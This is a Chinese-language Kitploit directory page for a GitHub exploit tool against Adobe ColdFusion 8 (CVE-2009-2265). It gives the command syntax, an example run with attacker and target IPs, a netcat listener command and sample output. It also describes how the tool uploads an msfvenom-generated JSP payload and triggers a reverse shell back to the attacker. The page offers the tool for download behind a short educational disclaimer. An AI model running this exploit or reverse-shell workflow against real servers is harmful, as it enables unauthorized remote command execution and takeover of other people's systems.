Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - 远程命令执行 (RCE) | Kitploit
工具/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - 远程命令执行 (RCE)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
131年前尚未审核

Adobe ColdFusion 8 - 远程命令执行 (RCE) 漏洞利用

概述

该漏洞利用针对 Adobe ColdFusion 8 中的一个已知漏洞(CVE-2009-2265)。它通过上传恶意 JSP 载荷来建立反向 shell 连接,从而实现远程命令执行 (RCE)。


漏洞详情

  • CVE:CVE-2009-2265
  • 漏洞类型:Adobe ColdFusion 8 对文件上传处理不当。
  • 受影响版本:Adobe ColdFusion 8。
  • 影响:允许攻击者在服务器上执行任意命令。

功能特性

  1. 自动使用 msfvenom 生成 JSP 载荷。
  2. 通过 multipart POST 请求上传载荷。
  3. 触发载荷以建立反向 shell。
  4. 执行后自动清理本地载荷文件。

使用方法

要使用此漏洞利用,您需要具备以下条件:

  • Kali Linux 机器或类似的渗透测试环境。
  • 安装 Netcat 用于监听指定端口。
  • 一个存在漏洞的 Adobe ColdFusion 8 服务器。

命令语法

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

参数说明

  • -l <LHOST>:本地攻击者 IP(例如 10.10.16.5)。
  • -p <LPORT>:本地攻击者用于反向 shell 的端口(例如 9001)。
  • -r <RHOST>:远程目标 IP(例如 10.10.10.11)。
  • -q <RPORT>:远程目标运行 ColdFusion 的端口(例如 8500)。

使用示例

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. 在攻击者机器上启动监听器:

    root@kitploit:~
    nc -lnvp 9001
    
  2. 使用适当的参数运行漏洞利用。

  3. 执行后,载荷将回连到您的监听器。


工作原理

  1. 生成载荷:

    • 脚本使用 msfvenom 生成恶意的 JSP 载荷。
    • 该载荷会向指定的 LHOST 和 LPORT 发起反向 shell 连接。
  2. 上传载荷:

    • 通过 POST 请求将载荷上传到存在漏洞的 ColdFusion 服务器。
  3. 触发载荷:

    • 通过发送 GET 请求到上传文件的 URL 来执行载荷。
  4. 建立反向 shell:

    • 建立反向 shell,赋予攻击者访问目标系统的权限。

环境需求

  • msfvenom:用于生成载荷。
  • curl:用于文件上传和触发载荷。
  • nc (Netcat):用于监听反向 shell 连接。

示例输出

root@kitploit:~
[+] 正在生成 JSP 反向 shell 载荷...
[+] 载荷已保存为 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'。
[+] 正在将载荷上传至目标...
[+] 服务器响应:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] 正在等待 Netcat 监听器在端口 9001 上启动...
[+] 检测到 Netcat 监听器已在端口 9001 上运行!
[+] 正在尝试触发载荷...
[+] 载荷已成功触发。请检查您的监听器以获取反向 shell。
[+] 正在清理本地文件...
[+] 完成!

免责声明

此脚本仅供教育目的使用。请仅用于您拥有或已获得明确授权的系统。未经授权在您不拥有所有权的系统上使用此漏洞利用是非法的且不道德的。


作者

由 [0xDTC] 开发。

下载工具